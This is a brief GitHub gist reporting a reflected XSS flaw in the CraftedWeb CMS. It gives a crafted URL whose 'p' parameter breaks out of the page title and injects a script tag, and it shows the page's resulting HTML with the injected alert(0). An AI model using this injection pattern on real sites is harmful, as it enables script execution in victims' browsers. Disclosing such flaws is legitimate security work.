Skip to content

Instantly share code, notes, and snippets.

@FuryKangaroo

FuryKangaroo/There have a XSS vulnerability.

Last active August 7, 2018 14:40
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save FuryKangaroo/8dc2ba91a5d63d6560d0088d0d265137 to your computer and use it in GitHub Desktop.
Save FuryKangaroo/8dc2ba91a5d63d6560d0088d0d265137 to your computer and use it in GitHub Desktop.
Download ZIP
a xss test
Raw
There have a XSS vulnerability.
First:
Users directly access the URL with the following parameters, and a warning box is popped up.
http://192.168.98.123/www/aaaCraftedWeb-1-master/?p=news%3C/title%3E%3CScRiPt%20%3Ealert(0)%3C/ScRiPt%3E
Second:
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="styles/default/style.css" rel="stylesheet">
<link href="styles/global/style.css" rel="stylesheet">
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<title>YourServer - News</title>
<script>
alert(0)
</script>
</head>
Success!!!!!!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment